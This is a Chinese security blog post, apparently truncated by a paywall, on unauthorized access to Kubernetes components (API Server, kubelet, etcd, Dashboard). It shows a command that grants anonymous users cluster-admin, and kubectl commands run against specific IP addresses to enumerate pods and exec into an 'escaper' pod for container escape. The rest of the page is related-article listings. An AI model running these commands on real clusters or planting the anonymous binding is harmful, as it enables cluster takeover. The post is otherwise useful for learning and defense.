K8s下的未授权及利用

最新推荐文章于 2025-06-27 18:34:24 发布
原创 最新推荐文章于 2025-06-27 18:34:24 发布 · 2.8k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细探讨了Kubernetes中的未授权访问问题,包括API Server的8080和6443端口、kubelet的10250端口、etcd的2379端口以及Dashboard页面的潜在风险。通过复现漏洞,阐述了如何利用这些未授权访问进行命令执行和权限提升,并介绍了RBAC、服务账户和卷挂载的工作原理。此外,还提供了漏洞检测和防范措施的思考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

它的未授权主要包括以下几种:

  • API Server,默认端口为8080,6443
  • kubelet,默认端口为10250
  • etcd,默认端口为2379
  • Dashboard面板泄露

一、API Server 80806443 未授权访问

K8s 的 API Server 默认服务端口为 8080 (insecure-port) 和 6443 (secure-port),8080 端口提供 HTTP 服务,没有认证授权机制,而 6443 端口提供 HTTPS 服务,支持认证 (使用令牌或客户端证书进行认证) 和授权服务。默认情况下 8080 端口不启动,而 6443 端口启动。这两个端口的开放取决于 /etc/kubernetes/manifests/kube-apiserver.yaml 配置文件。

如果目标 K8s 的 8080 端口开启了,由于其没有认证授权机制,因此存在未授权访问。

如果目标 K8s 的 6443 端口开启了,如果配置错误,也可以导致存在未授权访问。

漏洞复现

1、8080端口
默认情况下,8080端口是关闭的,需要我们手动开启
vim /etc/kubernetes/manifests/kube-apiserver.yaml

重启k8s
systemctl restart kubectl

访问 8080 端口即可看到存在未授权。

2、6443端口

如果配置不当,将 “system:anonymous” 用户绑定到 “cluster-admin” 用户组,则会使得 6443 端口允许匿名用户以管理员权限访问。

正常情况下访问 6443 端口,提示 Forbidden。

执行以下命令将 "system:anonymous" 用户绑定到 "cluster-admin" 用户组
kubectl create clusterrolebinding cluster-system-anonymous --clusterrole=cluster-admin --user=system:anonymous

知道这种未授权访问,有什么用呢?或者说我们应该如何利用呢?

下面来说说他的利用方式:

我们随便使用一台安装了kubectl的机器就行,简单来说,知道了API server未授权,其实就可以用kubectl来进行命令执行:

查看集群信息
kubectl -s http://101.26.108.16:8080 cluster-info


查看node节点信息以及pod信息
kubectl -s http://101.36.108.16:8080 get nodes
kubectl -s http://101.36.108.16:8080 get pods


查看node和pod的详细信息
kubectl -s http://101.36.108.16:8080 get nodes -o wide
kubectl -s http://101.36.108.16:8080 get pods describe pod escaper


进入到escaper(这是一个可以进行逃逸的环境),进行逃逸
kubectl -s http://101.36.108.16:8080 exec -n default -it escaper -- /bin/bash

补充:

K8s下通过挂载 /var/log 目录逃逸的原理主要是:
  1. 自定义服务账户:首先,在 Pod 中通过 serviceAccountName 指定一个自定义的服务账户。这意味着该 Pod 将使用指定的服务账户进行身份验证和授权。
  2. 授予宿主机目录权限:然后,使用 ClusterRoleClusterRoleBinding 为服务账户授予访问宿主机 /var/log 目录的权限。 ClusterRoleClusterRoleBinding 是 Kubernetes 中用于集群范围授权的机制。这意味着服务账户现在具有访问宿主机文件系统的特权。
  3. 挂载宿主机目录:接下来,在 Pod 的定义中,通过使用 hostPath 类型的 Volume,将宿主机的 /var/l
最低0.47元/天 解锁文章

200万优质内容无限畅学
wintercc1219
关注
【云安全】云原生- K8S API Server 未授权访问
仇辉攻防的博客
02-12 1592
API Server 是 Kubernetes 集群的核心管理接口,所有资源请求和操作都通过 kube-apiserver 提供的 API 进行处理。默认情况下,API Server 会监听两个端口:8080 和 6443。如果配置不当,可能会导致未授权访问的安全风险。
云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
m0_60607895的博客
04-06 1126
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Kubernetes Api Server未授权访问漏洞
weixin_71053667的博客
08-05 516
Kubernetes 的服务在正常启动后会开启两个端口:Localhost Port (默认8080)、Secure Port (默认6443)。这两个端口都是提供 Api Server 服务的,一个可以直接通过 Web 访问,另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限,那么攻击者就可以通过这两个接口去获取容器的权限。步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API 列表。步骤一:使用以下Fofa语法搜索Kubernetes产品。
Metrics 未授权访问漏洞【原理扫描】
最新发布
喝醉酒的小白
06-27 1781
而且该接口未做鉴权控制,从而被安全扫描工具识别为“未授权访问”漏洞。的输出或 HTTP 响应头),我可以进一步帮你确认是哪种服务。可能由某个应用随机使用,也可能是用户或某软件自定义配置的。,它通常不是系统保留或标准服务端口。Metrics 未授权访问漏洞【原理扫描】结合经验和漏洞分析,可以推测这个端口。如果你能提供该端口返回的部分内容(如。并不是某个广泛知名服务的。
云安全—kubelet 未授权
王嘟嘟的博客
04-10 3452
未授权一直是一个老生常谈的问题,云安全中也不可避免,本篇介绍kubelet的相关未授权漏洞。
云安全—K8S API Server 未授权访问
王嘟嘟的博客
10-30 2737
通常情况下k8s会有两个API服务,一个是8080,还有一个是6443。6443提供https服务,并且不对外开放,支持认证和授权服务,默认情况下8080是不启动的。
K8s攻击案例:组件未授权访问导致集群入侵
12-25 8901
K8s集群往往会因为组件的不安全配置存在未授权访问的情况,如果攻击者能够进行未授权访问,可能导致集群节点遭受入侵。比较常见的的组件未授权访问漏洞,主要包括 API Server 未授权访问kubelet 未授权访问、etcd 未授权访问、kube-proxy 不安全配置、Dashboard未授权访问。接下来,我们将对这几个未授权访问的攻击场景和攻击过程进行详细的分析。01、 API Server...
云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
ZL_1618的博客
06-28 1366
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。
云安全之k8s未授权漏洞总结
未完成的歌~的博客
03-27 1828
全称是 kubernetes,是谷歌在2014年推出的一种开源容器编排系统,后来捐赠给了云原生计算基金会(CNCF)。因将k后面的8个字母进行缩写后,被广泛简称为K8s。随着容器技术的发展,面临着容器数量庞大、难以管理的问题,K8s的推出很好的解决了这一问题,并且在容器编排系统中占据领先地位。Kubernetes 的名字来源于希腊语,意为“舵手”或“领航员”,寓意着它在容器编排领域如同舵手一般,引领着容器化应用的运行(docker的logo是一个运输船)。Master:管事的(决策者)
红队视角出发的k8s敏感信息收集——Kubernetes API 扩展与未授权访问
qq_44373268的博客
02-16 1311
为了查询特定自定义资源(CR)的实例数据,你可以使用kubectl get命令并指定自定义资源的类型和命名空间。以下是如何获取名为databases.example.com的CRD在default命名空间下的所有实例,并以YAML格式输出其详细信息。这条命令会输出所有属于databases.example.com类型的自定义资源实例的详细信息,包括它们的规格(spec)、状态(status)等。
kubernetes K8S超详细安装部署手册
02-02
- **弹性伸缩**:K8S能够根据预设策略或实时负载情况自动增加或减少容器实例的数量,从而实现资源的有效利用。 - **服务发现**:K8S支持服务间的自动发现机制,使得容器应用能够轻松地定位并连接到其他服务。 - **...
k8s中的认证授权
K1487994142的博客
10-14 1003
认证方式现共有8种,可以启用一种或多种认证方式,只要有一种认证方式通过,就不再进行其它方式的认证。用户账户是全局性的。其名称在集群各 namespace 中都是全局唯一的,未来的用户资源不会做 namespace 隔离, 服务账户是 namespace 隔离的。服务账户管理器管理各命名空间下的服务账户,并且保证每个活跃的命名空间下存在一个名为 “default” 的服务账户。用于拦截请求的一种方式,运行在认证、授权之后,是权限认证链上的最后一环,对请求API资源对象进行修改和校验。
k8s RBAC授权普通系统用户对namespace访问权限
疯飙的蜗牛
08-11 1150
背景:最近遇到一个问题,那就是需要给别人共享一下 Kubernetes 的某个资源的使用和访问权限,这个仅仅存在于某个 namespace 下,但是我又不能把管理员权限全都给它,我想只给他授予这一个 Namespace 下的权限,那应该怎么办呢?比如我这边是需要只想授予 ads这个用户 对 data 这个 Namespace 的权限,这里我就需要利用到 Kubernetes 里面的 RBAC 机制来实现了,下面记录了我的操作流程。四、导出 ads文件的config配置文件。一、创建ads用户的key。
云上攻防-云原生篇&K8s安全-Kubelet未授权访问、API Server未授权访问
明弟有理想的博客
09-13 2459
随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例:公有云、私有云、混合云、虚拟化集群等。以往渗透路径「外网突破->提权->权限维持->信息收集->横向移动->循环收集信息」,直到获得重要目标系统。但随着业务上云以及虚拟化技术的引入改变了这种格局,也打开了新的入侵路径
【云安全】云原生- K8S Kubelet 未授权访问
仇辉攻防的博客
02-13 1397
K8S中的kubelet是一个运行在每个工作节点上的核心组件,它负责管理Node(节点)上的容器生命周期、资源管理、镜像拉取、节点注册、Pod监控和报告、安全性控制以及日志和指标收集,协作容器运行时,以确保容器在节点上正确运行,从而实现容器编排和自动化容器管理。1、与 API Server 交互Kubelet 通过 Kubernetes API Server 获取分配给该节点的 Pod 任务,并报告 Pod 和节点的运行状态。2、Pod 管理负责管理节点上的 Pod,确保 Pod 中的容器按期望运行。
etcd未授权到控制k8s集群
Love&Share
01-25 5115
在安装完 K8s 后,默认会安装 etcd 组件,etcd 是一个高可用的 key-value 数据库,它为 k8s 集群提供底层数据存储,保存了整个集群的状态。大多数情形下,数据库中的内容没有加密,因此如果黑客拿下 etcd,就意味着能控制整个 K8s 集群。如果目标在启动 etcd 的时候没有开启证书认证选项,且 2379 端口直接对外开放的话,则存在 etcd 未授权访问漏洞。
【云安全】云原生- K8S etcd 未授权访问
仇辉攻防的博客
02-13 2364
etcd 是一个开源的分布式键值存储系统,主要用于存储和管理配置信息、状态数据以及服务发现信息。它采用 Raft 共识算法,确保数据的一致性和高可用性,能够在多个节点上运行,保证在部分节点故障时仍能继续提供服务。在 Kubernetes 中,etcd 扮演着关键角色,用于存储集群的所有资源数据(如 Pod、Service 和 Deployment 的信息)。Kubernetes 通过与 etcd 的交互,获取集群的当前状态并确保集群的一致性。
K8s攻击案例:Dashboard未授权访问
01-02 788
Dashboard 在配置不当情况下有可能会产生未授权访问的情况,从而有可能进一步造成接管集群。 (1)攻击场景 在deployment中开启enable-skip-login,那么就可以在登录界面点击跳过登录进dashboard。 将默认的Kubernetes-dashboard绑定cluster-admin,拥有管理集群管权限 kubectl create clusterrolebind...
K8S助力企业微服务转型:全面部署与实践指南
"如何利用Kubernetes (K8S) 全面拥抱微服务架构?K8S作为一款以服务为中心的创新平台,其设计理念完全符合微服务架构的核心思想,即通过将大型单一应用程序分解为小型、互相连接的微服务来提高系统的灵活性和可扩展...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值